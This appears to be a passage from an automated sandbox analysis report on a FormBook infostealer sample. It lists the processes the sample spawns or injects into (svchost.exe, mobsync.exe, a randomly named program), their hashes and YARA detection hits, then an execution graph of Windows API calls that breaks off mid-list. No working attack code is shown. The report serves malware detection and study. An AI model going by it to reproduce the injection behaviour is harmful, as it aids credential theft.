                                         Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jX%2Ftr0tYJK%2FVuPWsk1Rktd8%2Bi8Yl8lwFv%2BsNV5OydejmiqjzgIuv4kXEYkHtbAym5mkB9SsvlsE1%2F4hU4puZTfmlRAFPQt1A7Bz7sKleyfDteJcLCGu4UUtaBh%2F4lY3Ztv6gjHlXYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                         NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                         Server: cloudflare
                                         CF-RAY: 900044fe2a950f80-EWR
                                         alt-svc: h3=":443"; ma=86400
                                         server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=812&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=377&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <di
                                         Jan 10, 2025 23:58:02.849045992 CET | 888 | IN |
                                         Data Ascii: v style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">N


                                        Target ID:0
                                        Start time:17:57:22
                                        Start date:10/01/2025
                                        Path:C:\Users\user\Desktop\Gz2FxKx2cM.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                                        Imagebase:0x900000
                                        File size:1'211'904 bytes
                                        MD5 hash:F0483EFD3C238F3181609C3AA40FDAC6
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:17:57:25
                                        Start date:10/01/2025
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Gz2FxKx2cM.exe"
                                        Imagebase:0x390000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1677515886.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1677859953.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1678285172.0000000004550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:17:57:40
                                        Start date:10/01/2025
                                        Path:C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe"
                                        Imagebase:0x850000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2675484945.0000000003440000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:7
                                        Start time:17:57:41
                                        Start date:10/01/2025
                                        Path:C:\Windows\SysWOW64\mobsync.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                        Imagebase:0x210000
                                        File size:93'696 bytes
                                        MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1921397485.0000000004180000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1921482656.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:17:57:55
                                        Start date:10/01/2025
                                        Path:C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe"
                                        Imagebase:0x850000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2677153382.0000000004B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:high
                                        Has exited:false

                                        Target ID:9
                                        Start time:17:58:07
                                        Start date:10/01/2025
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false


                                          Execution Graph

                                          Execution Coverage:3.6%
                                          Dynamic/Decrypted Code Coverage:1.5%
                                          Signature Coverage:8.3%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:165
104377->104440 104381 93ed55 __wsetenvp _memmove 104378->104381 104380 907cca 104380->104344 104386 920dbe 104382->104386 104384 920dd8 104384->104350 104386->104384 104387 920ddc std::exception::exception 104386->104387 104395 92571c 104386->104395 104412 9233a1 DecodePointer 104386->104412 104413 92859b RaiseException 104387->104413 104389 920e06 104414 9284d1 58 API calls _free 104389->104414 104391 920e18 104391->104350 104393 920db6 Mailbox 59 API calls 104392->104393 104394 9040a6 104393->104394 104394->104330 104394->104331 104396 925797 104395->104396 104406 925728 104395->104406 104421 9233a1 DecodePointer 104396->104421 104398 92579d 104422 928b28 58 API calls __getptd_noexit 104398->104422 104401 92575b RtlAllocateHeap 104402 92578f 104401->104402 104401->104406 104402->104386 104404 925733 104404->104406 104415 92a16b 58 API calls 2 library calls 104404->104415 104416 92a1c8 58 API calls 7 library calls 104404->104416 104417 92309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104404->104417 104405 925783 104419 928b28 58 API calls __getptd_noexit 104405->104419 104406->104401 104406->104404 104406->104405 104410 925781 104406->104410 104418 9233a1 DecodePointer 104406->104418 104420 928b28 58 API calls __getptd_noexit 104410->104420 104412->104386 104413->104389 104414->104391 104415->104404 104416->104404 104418->104406 104419->104410 104420->104402 104421->104398 104422->104402 104423->104361 104425 907d43 _memmove 104424->104425 104426 907d3a 104424->104426 104425->104361 104426->104425 104428 907e4f 104426->104428 104429 907e62 104428->104429 104431 907e5f _memmove 104428->104431 104430 920db6 Mailbox 59 API calls 104429->104430 104430->104431 104431->104425 104433 907a5f 104432->104433 104435 907a85 _memmove 104432->104435 104434 920db6 Mailbox 59 API calls 104433->104434 104433->104435 104436 907ad4 104434->104436 104435->104367 104437 920db6 Mailbox 59 API calls 104436->104437 104437->104435 104438->104368 104439->104373 
104441 907c5f __wsetenvp 104440->104441 104442 908029 59 API calls 104441->104442 104443 907c70 _memmove 104441->104443 104444 93ed07 _memmove 104442->104444 104443->104380 104446 93d423 104445->104446 104447 904196 104445->104447 104446->104447 104448 93d42c DestroyIcon 104446->104448 104447->104316 104449 962f94 62 API calls _W_store_winword 104447->104449 104448->104447 104449->104316 104450 927c56 104451 927c62 __close 104450->104451 104487 929e08 GetStartupInfoW 104451->104487 104453 927c67 104489 928b7c GetProcessHeap 104453->104489 104455 927cbf 104456 927cca 104455->104456 104572 927da6 58 API calls 3 library calls 104455->104572 104490 929ae6 104456->104490 104459 927cd0 104460 927cdb __RTC_Initialize 104459->104460 104573 927da6 58 API calls 3 library calls 104459->104573 104511 92d5d2 104460->104511 104463 927cea 104464 927cf6 GetCommandLineW 104463->104464 104574 927da6 58 API calls 3 library calls 104463->104574 104530 934f23 GetEnvironmentStringsW 104464->104530 104467 927cf5 104467->104464 104470 927d10 104471 927d1b 104470->104471 104575 9230b5 58 API calls 3 library calls 104470->104575 104540 934d58 104471->104540 104474 927d21 104477 927d2c 104474->104477 104576 9230b5 58 API calls 3 library calls 104474->104576 104554 9230ef 104477->104554 104478 927d34 104479 927d3f __wwincmdln 104478->104479 104577 9230b5 58 API calls 3 library calls 104478->104577 104560 9047d0 104479->104560 104482 927d53 104483 927d62 104482->104483 104578 923358 58 API calls _doexit 104482->104578 104579 9230e0 58 API calls _doexit 104483->104579 104486 927d67 __close 104488 929e1e 104487->104488 104488->104453 104489->104455 104580 923187 36 API calls 2 library calls 104490->104580 104492 929aeb 104581 929d3c InitializeCriticalSectionAndSpinCount ___lock_fhandle 104492->104581 104494 929af0 104495 929af4 104494->104495 104583 929d8a TlsAlloc 104494->104583 104582 929b5c 61 API calls 2 library calls 104495->104582 104498 929b06 104498->104495 104500 929b11 104498->104500 
104499 929af9 104499->104459 104584 9287d5 104500->104584 104503 929b53 104592 929b5c 61 API calls 2 library calls 104503->104592 104506 929b32 104506->104503 104508 929b38 104506->104508 104507 929b58 104507->104459 104591 929a33 58 API calls 4 library calls 104508->104591 104510 929b40 GetCurrentThreadId 104510->104459 104512 92d5de __close 104511->104512 104604 929c0b 104512->104604 104514 92d5e5 104515 9287d5 __calloc_crt 58 API calls 104514->104515 104516 92d5f6 104515->104516 104517 92d661 GetStartupInfoW 104516->104517 104518 92d601 __close @_EH4_CallFilterFunc@8 104516->104518 104519 92d676 104517->104519 104520 92d7a5 104517->104520 104518->104463 104519->104520 104523 9287d5 __calloc_crt 58 API calls 104519->104523 104525 92d6c4 104519->104525 104521 92d86d 104520->104521 104524 92d7f2 GetStdHandle 104520->104524 104526 92d805 GetFileType 104520->104526 104612 929e2b InitializeCriticalSectionAndSpinCount 104520->104612 104613 92d87d LeaveCriticalSection _doexit 104521->104613 104523->104519 104524->104520 104525->104520 104527 92d6f8 GetFileType 104525->104527 104611 929e2b InitializeCriticalSectionAndSpinCount 104525->104611 104526->104520 104527->104525 104531 934f34 104530->104531 104532 927d06 104530->104532 104653 92881d 58 API calls __malloc_crt 104531->104653 104536 934b1b GetModuleFileNameW 104532->104536 104534 934f5a _memmove 104535 934f70 FreeEnvironmentStringsW 104534->104535 104535->104532 104537 934b4f _wparse_cmdline 104536->104537 104539 934b8f _wparse_cmdline 104537->104539 104654 92881d 58 API calls __malloc_crt 104537->104654 104539->104470 104541 934d71 __wsetenvp 104540->104541 104545 934d69 104540->104545 104542 9287d5 __calloc_crt 58 API calls 104541->104542 104550 934d9a __wsetenvp 104542->104550 104543 934df1 104544 922d55 _free 58 API calls 104543->104544 104544->104545 104545->104474 104546 9287d5 __calloc_crt 58 API calls 104546->104550 104547 934e16 104548 922d55 _free 58 API calls 104547->104548 104548->104545 104550->104543 
104550->104545 104550->104546 104550->104547 104551 934e2d 104550->104551 104655 934607 58 API calls 2 library calls 104550->104655 104656 928dc6 IsProcessorFeaturePresent 104551->104656 104553 934e39 104553->104474 104555 9230fb __IsNonwritableInCurrentImage 104554->104555 104679 92a4d1 104555->104679 104557 923119 __initterm_e 104559 923138 __cinit __IsNonwritableInCurrentImage 104557->104559 104682 922d40 104557->104682 104559->104478 104561 9047ea 104560->104561 104571 904889 104560->104571 104562 904824 IsThemeActive 104561->104562 104717 92336c 104562->104717 104566 904850 104729 9048fd SystemParametersInfoW SystemParametersInfoW 104566->104729 104568 90485c 104730 903b3a 104568->104730 104570 904864 SystemParametersInfoW 104570->104571 104571->104482 104572->104456 104573->104460 104574->104467 104578->104483 104579->104486 104580->104492 104581->104494 104582->104499 104583->104498 104585 9287dc 104584->104585 104587 928817 104585->104587 104589 9287fa 104585->104589 104593 9351f6 104585->104593 104587->104503 104590 929de6 TlsSetValue 104587->104590 104589->104585 104589->104587 104601 92a132 Sleep 104589->104601 104590->104506 104591->104510 104592->104507 104594 935201 104593->104594 104596 93521c 104593->104596 104595 93520d 104594->104595 104594->104596 104602 928b28 58 API calls __getptd_noexit 104595->104602 104598 93522c HeapAlloc 104596->104598 104599 935212 104596->104599 104603 9233a1 DecodePointer 104596->104603 104598->104596 104598->104599 104599->104585 104601->104589 104602->104599 104603->104596 104605 929c2f EnterCriticalSection 104604->104605 104606 929c1c 104604->104606 104605->104514 104614 929c93 104606->104614 104608 929c22 104608->104605 104638 9230b5 58 API calls 3 library calls 104608->104638 104611->104525 104612->104520 104613->104518 104615 929c9f __close 104614->104615 104616 929cc0 104615->104616 104617 929ca8 104615->104617 104630 929ce1 __close 104616->104630 104642 92881d 58 API calls __malloc_crt 104616->104642 104639 
92a16b 58 API calls 2 library calls 104617->104639 104620 929cad 104640 92a1c8 58 API calls 7 library calls 104620->104640 104621 929cd5 104623 929ceb 104621->104623 104624 929cdc 104621->104624 104628 929c0b __lock 58 API calls 104623->104628 104643 928b28 58 API calls __getptd_noexit 104624->104643 104625 929cb4 104641 92309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104625->104641 104631 929cf2 104628->104631 104630->104608 104632 929d17 104631->104632 104633 929cff 104631->104633 104645 922d55 104632->104645 104644 929e2b InitializeCriticalSectionAndSpinCount 104633->104644 104636 929d0b 104651 929d33 LeaveCriticalSection _doexit 104636->104651 104639->104620 104640->104625 104642->104621 104643->104630 104644->104636 104646 922d87 __dosmaperr 104645->104646 104647 922d5e RtlFreeHeap 104645->104647 104646->104636 104647->104646 104648 922d73 104647->104648 104652 928b28 58 API calls __getptd_noexit 104648->104652 104650 922d79 GetLastError 104650->104646 104651->104630 104652->104650 104653->104534 104654->104539 104655->104550 104657 928dd1 104656->104657 104662 928c59 104657->104662 104661 928dec 104661->104553 104663 928c73 _memset __call_reportfault 104662->104663 104664 928c93 IsDebuggerPresent 104663->104664 104670 92a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 104664->104670 104667 928d57 __call_reportfault 104671 92c5f6 104667->104671 104668 928d7a 104669 92a140 GetCurrentProcess TerminateProcess 104668->104669 104669->104661 104670->104667 104672 92c600 IsProcessorFeaturePresent 104671->104672 104673 92c5fe 104671->104673 104675 93590a 104672->104675 104673->104668 104678 9358b9 5 API calls 2 library calls 104675->104678 104677 9359ed 104677->104668 104678->104677 104680 92a4d4 EncodePointer 104679->104680 104680->104680 104681 92a4ee 104680->104681 104681->104557 104685 922c44 104682->104685 104684 922d4b 104684->104559 104686 922c50 __close 104685->104686 104693 923217 104686->104693 104692 922c77 __close 
104692->104684 104694 929c0b __lock 58 API calls 104693->104694 104695 922c59 104694->104695 104696 922c88 DecodePointer DecodePointer 104695->104696 104697 922c65 104696->104697 104698 922cb5 104696->104698 104707 922c82 104697->104707 104698->104697 104710 9287a4 59 API calls 2 library calls 104698->104710 104700 922d18 EncodePointer EncodePointer 104700->104697 104701 922cc7 104701->104700 104703 922cec 104701->104703 104711 928864 61 API calls 2 library calls 104701->104711 104703->104697 104705 922d06 EncodePointer 104703->104705 104712 928864 61 API calls 2 library calls 104703->104712 104705->104700 104706 922d00 104706->104697 104706->104705 104713 923220 104707->104713 104710->104701 104711->104703 104712->104706 104716 929d75 LeaveCriticalSection 104713->104716 104715 922c87 104715->104692 104716->104715 104718 929c0b __lock 58 API calls 104717->104718 104719 923377 DecodePointer EncodePointer 104718->104719 104782 929d75 LeaveCriticalSection 104719->104782 104721 904849 104722 9233d4 104721->104722 104723 9233f8 104722->104723 104724 9233de 104722->104724 104723->104566 104724->104723 104783 928b28 58 API calls __getptd_noexit 104724->104783 104726 9233e8 104784 928db6 9 API calls __write_nolock 104726->104784 104728 9233f3 104728->104566 104729->104568 104731 903b47 __write_nolock 104730->104731 104785 907667 104731->104785 104735 903b7a IsDebuggerPresent 104736 93d272 MessageBoxA 104735->104736 104737 903b88 104735->104737 104740 93d28c 104736->104740 104738 903c61 104737->104738 104737->104740 104741 903ba5 104737->104741 104739 903c68 SetCurrentDirectoryW 104738->104739 104744 903c75 Mailbox 104739->104744 104989 907213 59 API calls Mailbox 104740->104989 104871 907285 104741->104871 104744->104570 104746 903bc3 GetFullPathNameW 104747 907bcc 59 API calls 104746->104747 104749 903bfe 104747->104749 104748 93d29c 104750 93d2b2 SetCurrentDirectoryW 104748->104750 104887 91092d 104749->104887 104750->104744 104753 903c1c 104754 903c26 104753->104754 
104990 95874b AllocateAndInitializeSid CheckTokenMembership FreeSid 104753->104990 104903 903a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 104754->104903 104758 93d2cf 104758->104754 104761 93d2e0 104758->104761 104760 903c30 104763 903c43 104760->104763 104765 90434a 68 API calls 104760->104765 104991 904706 104761->104991 104911 9109d0 104763->104911 104764 93d2e8 104998 907de1 104764->104998 104765->104763 104768 903c4e 104768->104738 104988 90443a Shell_NotifyIconW _memset 104768->104988 104769 93d2f5 104770 93d324 104769->104770 104771 93d2ff 104769->104771 104774 907cab 59 API calls 104770->104774 104773 907cab 59 API calls 104771->104773 104775 93d30a 104773->104775 104776 93d320 GetForegroundWindow ShellExecuteW 104774->104776 104777 907b2e 59 API calls 104775->104777 104780 93d354 Mailbox 104776->104780 104779 93d317 104777->104779 104780->104738 104782->104721 104783->104726 104784->104728 104786 920db6 Mailbox 59 API calls 104785->104786 104787 907688 104786->104787 104788 920db6 Mailbox 59 API calls 104787->104788 104789 903b51 GetCurrentDirectoryW 104788->104789 104790 903766 104789->104790 104791 907667 59 API calls 104790->104791 104792 90377c 104791->104792 105002 903d31 104792->105002 104794 90379a 104795 904706 61 API calls 104794->104795 104796 9037ae 104795->104796 104797 907de1 59 API calls 104796->104797 104798 9037bb 104797->104798 105016 904ddd 104798->105016 104801 93d173 105083 96955b 104801->105083 104802 9037dc Mailbox 104806 908047 59 API calls 104802->104806 104805 93d192 104808 922d55 _free 58 API calls 104805->104808 104809 9037ef 104806->104809 104811 93d19f 104808->104811 105040 90928a 104809->105040 104812 904e4a 84 API calls 104811->104812 104814 93d1a8 104812->104814 104818 903ed0 59 API calls 104814->104818 104815 907de1 59 API calls 104816 903808 104815->104816 105043 9084c0 104816->105043 104820 93d1c3 104818->104820 104819 90381a Mailbox 104821 907de1 59 API calls 104819->104821 104822 903ed0 59 API calls 
104820->104822 104823 903840 104821->104823 104824 93d1df 104822->104824 104825 9084c0 69 API calls 104823->104825 104826 904706 61 API calls 104824->104826 104828 90384f Mailbox 104825->104828 104827 93d204 104826->104827 104829 903ed0 59 API calls 104827->104829 104830 907667 59 API calls 104828->104830 104831 93d210 104829->104831 104833 90386d 104830->104833 104832 908047 59 API calls 104831->104832 104834 93d21e 104832->104834 105047 903ed0 104833->105047 104836 903ed0 59 API calls 104834->104836 104840 93d22d 104836->104840 104839 903887 104839->104814 104841 903891 104839->104841 104844 908047 59 API calls 104840->104844 104842 922efd _W_store_winword 60 API calls 104841->104842 104843 90389c 104842->104843 104843->104820 104845 9038a6 104843->104845 104846 93d24f 104844->104846 104847 922efd _W_store_winword 60 API calls 104845->104847 104848 903ed0 59 API calls 104846->104848 104849 9038b1 104847->104849 104850 93d25c 104848->104850 104849->104824 104851 9038bb 104849->104851 104850->104850 104852 922efd _W_store_winword 60 API calls 104851->104852 104853 9038c6 104852->104853 104853->104840 104854 903907 104853->104854 104856 903ed0 59 API calls 104853->104856 104854->104840 104855 903914 104854->104855 105063 9092ce 104855->105063 104857 9038ea 104856->104857 104859 908047 59 API calls 104857->104859 104861 9038f8 104859->104861 104863 903ed0 59 API calls 104861->104863 104863->104854 104866 90928a 59 API calls 104868 90394f 104866->104868 104867 908ee0 60 API calls 104867->104868 104868->104866 104868->104867 104869 903ed0 59 API calls 104868->104869 104870 903995 Mailbox 104868->104870 104869->104868 104870->104735 104872 907292 __write_nolock 104871->104872 104873 93ea22 _memset 104872->104873 104874 9072ab 104872->104874 104877 93ea3e GetOpenFileNameW 104873->104877 105711 904750 104874->105711 104879 93ea8d 104877->104879 104880 907bcc 59 API calls 104879->104880 104882 93eaa2 104880->104882 104882->104882 104884 9072c9 105739 90686a 104884->105739 
104888 91093a __write_nolock 104887->104888 106000 906d80 104888->106000 104890 91093f 104902 903c14 104890->104902 106011 91119e 89 API calls 104890->106011 104892 91094c 104892->104902 106012 913ee7 91 API calls Mailbox 104892->106012 104894 910955 104895 910959 GetFullPathNameW 104894->104895 104894->104902 104896 907bcc 59 API calls 104895->104896 104897 910985 104896->104897 104898 907bcc 59 API calls 104897->104898 104899 910992 104898->104899 104900 944cab _wcscat 104899->104900 104901 907bcc 59 API calls 104899->104901 104901->104902 104902->104748 104902->104753 104904 903ab0 LoadImageW RegisterClassExW 104903->104904 104905 93d261 104903->104905 106045 903041 7 API calls 104904->106045 106046 9047a0 LoadImageW EnumResourceNamesW 104905->106046 104908 93d26a 104909 903b34 104910 9039d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 104909->104910 104910->104760 104912 944cc3 104911->104912 104925 9109f5 104911->104925 106186 969e4a 89 API calls 4 library calls 104912->106186 104914 910cfa 104914->104768 104917 910ee4 104917->104914 104919 910ef1 104917->104919 104918 910a4b PeekMessageW 104987 910a05 Mailbox 104918->104987 106184 911093 331 API calls Mailbox 104919->106184 104922 910ef8 LockWindowUpdate DestroyWindow GetMessageW 104922->104914 104923 910f2a 104922->104923 104927 945c58 TranslateMessage DispatchMessageW GetMessageW 104923->104927 104924 910ce4 104924->104914 106183 911070 10 API calls Mailbox 104924->106183 104925->104987 106187 909e5d 60 API calls 104925->106187 106188 956349 331 API calls 104925->106188 104926 944e81 Sleep 104926->104987 104927->104927 104929 945c88 104927->104929 104929->104914 104930 944d50 TranslateAcceleratorW 104932 910e43 PeekMessageW 104930->104932 104930->104987 104931 909e5d 60 API calls 104931->104987 104932->104987 104933 910ea5 TranslateMessage DispatchMessageW 104933->104932 104934 94581f WaitForSingleObject 104937 94583c GetExitCodeProcess CloseHandle 104934->104937 104934->104987 104936 910d13 
timeGetTime 104936->104987 104971 910f95 104937->104971 104938 910e5f Sleep 104972 910e70 Mailbox 104938->104972 104939 908047 59 API calls 104939->104987 104940 907667 59 API calls 104940->104972 104941 945af8 Sleep 104941->104972 104943 920db6 59 API calls Mailbox 104943->104987 104945 910f4e timeGetTime 106185 909e5d 60 API calls 104945->106185 104946 92049f timeGetTime 104946->104972 104949 945b8f GetExitCodeProcess 104952 945ba5 WaitForSingleObject 104949->104952 104953 945bbb CloseHandle 104949->104953 104951 90b7dd 109 API calls 104951->104972 104952->104953 104952->104987 104953->104972 104956 985f25 110 API calls 104956->104972 104957 945874 104957->104971 104958 945078 Sleep 104958->104987 104959 945c17 Sleep 104959->104987 104961 907de1 59 API calls 104961->104972 104965 909ea0 304 API calls 104965->104987 104971->104768 104972->104940 104972->104946 104972->104949 104972->104951 104972->104956 104972->104957 104972->104958 104972->104959 104972->104961 104972->104971 104972->104987 106213 962408 60 API calls 104972->106213 106214 909e5d 60 API calls 104972->106214 106215 9089b3 69 API calls Mailbox 104972->106215 106216 90b73c 331 API calls 104972->106216 106217 9564da 60 API calls 104972->106217 106218 965244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104972->106218 106219 963c55 66 API calls Mailbox 104972->106219 104973 907de1 59 API calls 104973->104987 104974 969e4a 89 API calls 104974->104987 104976 909c90 59 API calls Mailbox 104976->104987 104977 90b73c 304 API calls 104977->104987 104979 9084c0 69 API calls 104979->104987 104980 95617e 59 API calls Mailbox 104980->104987 104981 9089b3 69 API calls 104981->104987 104982 9455d5 VariantClear 104982->104987 104983 956e8f 59 API calls 104983->104987 104984 94566b VariantClear 104984->104987 104985 908cd4 59 API calls Mailbox 104985->104987 104986 945419 VariantClear 104986->104987 104987->104918 104987->104924 104987->104926 104987->104930 104987->104931 
104987->104932 104987->104933 104987->104934 104987->104936 104987->104938 104987->104939 104987->104941 104987->104943 104987->104945 104987->104965 104987->104971 104987->104972 104987->104973 104987->104974 104987->104976 104987->104977 104987->104979 104987->104980 104987->104981 104987->104982 104987->104983 104987->104984 104987->104985 104987->104986 106047 90e6a0 104987->106047 106078 90f460 104987->106078 106097 9031ce 104987->106097 106102 90e420 331 API calls 104987->106102 106103 90fce0 104987->106103 106189 986018 59 API calls 104987->106189 106190 969a15 59 API calls Mailbox 104987->106190 106191 95d4f2 59 API calls 104987->106191 106192 909837 104987->106192 106210 9560ef 59 API calls 2 library calls 104987->106210 106211 908401 59 API calls 104987->106211 106212 9082df 59 API calls Mailbox 104987->106212 104988->104738 104989->104748 104990->104758 104992 931940 __write_nolock 104991->104992 104993 904713 GetModuleFileNameW 104992->104993 104994 907de1 59 API calls 104993->104994 104995 904739 104994->104995 104996 904750 60 API calls 104995->104996 104997 904743 Mailbox 104996->104997 104997->104764 104999 907df0 __wsetenvp _memmove 104998->104999 105000 920db6 Mailbox 59 API calls 104999->105000 105001 907e2e 105000->105001 105001->104769 105003 903d3e __write_nolock 105002->105003 105004 907bcc 59 API calls 105003->105004 105008 903ea4 Mailbox 105003->105008 105006 903d70 105004->105006 105012 903da6 Mailbox 105006->105012 105124 9079f2 105006->105124 105007 903e77 105007->105008 105009 907de1 59 API calls 105007->105009 105008->104794 105011 903e98 105009->105011 105010 907de1 59 API calls 105010->105012 105013 903f74 59 API calls 105011->105013 105012->105007 105012->105008 105012->105010 105015 9079f2 59 API calls 105012->105015 105127 903f74 105012->105127 105013->105008 105015->105012 105133 904bb5 105016->105133 105021 93d8e6 105023 904e4a 84 API calls 105021->105023 105022 904e08 LoadLibraryExW 105143 904b6a 105022->105143 105025 93d8ed 
105023->105025 105027 904b6a 3 API calls 105025->105027 105029 93d8f5 105027->105029 105169 904f0b 105029->105169 105030 904e2f 105030->105029 105031 904e3b 105030->105031 105032 904e4a 84 API calls 105031->105032 105034 9037d4 105032->105034 105034->104801 105034->104802 105037 93d91c 105177 904ec7 105037->105177 105039 93d929 105041 920db6 Mailbox 59 API calls 105040->105041 105042 9037fb 105041->105042 105042->104815 105044 9084cb 105043->105044 105046 9084f2 105044->105046 105431 9089b3 69 API calls Mailbox 105044->105431 105046->104819 105048 903ef3 105047->105048 105049 903eda 105047->105049 105051 907bcc 59 API calls 105048->105051 105050 908047 59 API calls 105049->105050 105052 903879 105050->105052 105051->105052 105053 922efd 105052->105053 105054 922f09 105053->105054 105055 922f7e 105053->105055 105062 922f2e 105054->105062 105432 928b28 58 API calls __getptd_noexit 105054->105432 105434 922f90 60 API calls 4 library calls 105055->105434 105058 922f8b 105058->104839 105059 922f15 105433 928db6 9 API calls __write_nolock 105059->105433 105061 922f20 105061->104839 105062->104839 105064 9092d6 105063->105064 105065 920db6 Mailbox 59 API calls 105064->105065 105066 9092e4 105065->105066 105067 903924 105066->105067 105435 9091fc 59 API calls Mailbox 105066->105435 105069 909050 105067->105069 105436 909160 105069->105436 105071 90905f 105072 920db6 Mailbox 59 API calls 105071->105072 105073 903932 105071->105073 105072->105073 105074 908ee0 105073->105074 105075 93f17c 105074->105075 105080 908ef7 105074->105080 105075->105080 105446 908bdb 59 API calls Mailbox 105075->105446 105077 909040 105445 909d3c 60 API calls Mailbox 105077->105445 105078 908ff8 105081 920db6 Mailbox 59 API calls 105078->105081 105080->105077 105080->105078 105082 908fff 105080->105082 105081->105082 105082->104868 105084 904ee5 85 API calls 105083->105084 105085 9695ca 105084->105085 105447 969734 105085->105447 105088 904f0b 74 API calls 105089 9695f7 105088->105089 105090 904f0b 
74 API calls 105089->105090 105091 969607 105090->105091 105092 904f0b 74 API calls 105091->105092 105093 969622 105092->105093 105094 904f0b 74 API calls 105093->105094 105095 96963d 105094->105095 105096 904ee5 85 API calls 105095->105096 105097 969654 105096->105097 105098 92571c __malloc_crt 58 API calls 105097->105098 105099 96965b 105098->105099 105100 92571c __malloc_crt 58 API calls 105099->105100 105101 969665 105100->105101 105102 904f0b 74 API calls 105101->105102 105103 969679 105102->105103 105104 969109 GetSystemTimeAsFileTime 105103->105104 105105 96968c 105104->105105 105106 9696b6 105105->105106 105107 9696a1 105105->105107 105109 9696bc 105106->105109 105110 96971b 105106->105110 105108 922d55 _free 58 API calls 105107->105108 105111 9696a7 105108->105111 105453 968b06 116 API calls __fcloseall 105109->105453 105113 922d55 _free 58 API calls 105110->105113 105114 922d55 _free 58 API calls 105111->105114 105116 93d186 105113->105116 105114->105116 105115 969713 105117 922d55 _free 58 API calls 105115->105117 105116->104805 105118 904e4a 105116->105118 105117->105116 105119 904e54 105118->105119 105120 904e5b 105118->105120 105454 9253a6 